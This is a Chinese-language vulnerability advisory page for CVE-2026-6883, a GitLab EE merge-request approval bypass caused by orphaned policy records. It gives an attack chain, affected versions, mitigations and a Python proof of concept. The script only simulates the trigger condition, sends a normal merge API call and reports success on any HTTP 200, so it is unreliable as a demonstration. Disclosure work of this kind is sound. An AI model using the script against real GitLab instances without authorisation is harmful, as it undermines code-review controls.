CVE-2026-6883 CVSS 2.6 低危

CVE-2026-6883 GitLab EE合并请求批准绕过漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6883

漏洞类型

权限绕过

CVSS评分

2.6 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

GitLab EE

漏洞概述

GitLab企业版（EE）中存在一处安全漏洞，由于系统对孤立策略记录的清理不当，经认证的攻击者可以绕过合并请求的批准要求。该漏洞影响了从15.7版本到18.11.3之前的多个版本。攻击者需要具备低权限账户并进行用户交互。成功利用此漏洞可能导致未经授权的代码被合并到主分支，影响代码仓库的完整性。目前CVSS评分为2.6，属于低危级别。

技术细节

该漏洞的核心原因在于GitLab在处理安全策略时未能彻底清理孤立的策略记录。当相关的项目、组或其他引用策略的对象被删除或修改后，对应的策略记录可能残留在数据库中成为“孤儿”记录。攻击者可以通过特定的操作序列（如创建并删除特定资源）触发此状态。随后，当攻击者尝试合并代码时，系统在校验批准状态时可能会引用这些无效的孤立记录。由于这些记录不再关联有效的安全规则，校验逻辑失效，导致系统错误地认为请求已获批准或无需批准，从而允许攻击者绕过原本强制执行的代码审查流程。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标GitLab实例，确认其运行在受影响的版本范围内（15.7至18.11.3）。

STEP 2

Initial Access

攻击者使用合法的低权限账户登录GitLab系统。

STEP 3

Execution

攻击者执行特定操作序列，导致系统中产生孤立的策略记录，或者找到现有的孤立记录。

STEP 4

Exploitation

攻击者发起合并请求，并利用孤立记录导致的校验逻辑缺陷，直接执行合并操作。

STEP 5

Impact

未经授权的代码被合并到受保护分支，绕过了代码审查和批准流程。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Conceptual Proof of Concept for CVE-2026-6883
# This script demonstrates the potential to bypass merge request approvals
# due to improper cleanup of orphaned policy records.

TARGET = "https://gitlab.example.com"
TOKEN = "your_access_token"
PROJECT_ID = "1"
MR_IID = "2"

headers = {"PRIVATE-TOKEN": TOKEN}

def exploit():
    # Step 1: Attacker authenticates and identifies a target Merge Request
    print(f"[*] Targeting MR {MR_IID} on Project {PROJECT_ID}...")

    # Step 2: Trigger the condition where orphaned policy records exist
    # (In a real scenario, this involves specific API interactions to create/del policies)
    print("[*] Simulating environment with orphaned policy records...")

    # Step 3: Attempt to accept the Merge Request without full approvals
    url = f"{TARGET}/api/v4/projects/{PROJECT_ID}/merge_requests/{MR_IID}/merge"
    payload = {
        "merge_when_pipeline_succeeds": True,
        "should_remove_source_branch": False
    }

    response = requests.put(url, headers=headers, json=payload)

    if response.status_code == 200:
        print("[+] Exploit successful! Merge Request accepted bypassing approval rules.")
    else:
        print(f"[-] Exploit failed. Status: {response.status_code}")
        print(response.text)

if __name__ == "__main__":
    exploit()

影响范围

GitLab EE >= 15.7, < 18.9.7

GitLab EE >= 18.10, < 18.10.6

GitLab EE >= 18.11, < 18.11.3

防御指南

临时缓解措施

如果无法立即升级，管理员应实施更严格的人工审核流程，对所有合并请求进行二次确认，并检查系统中是否存在孤立的扫描结果或策略配置。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表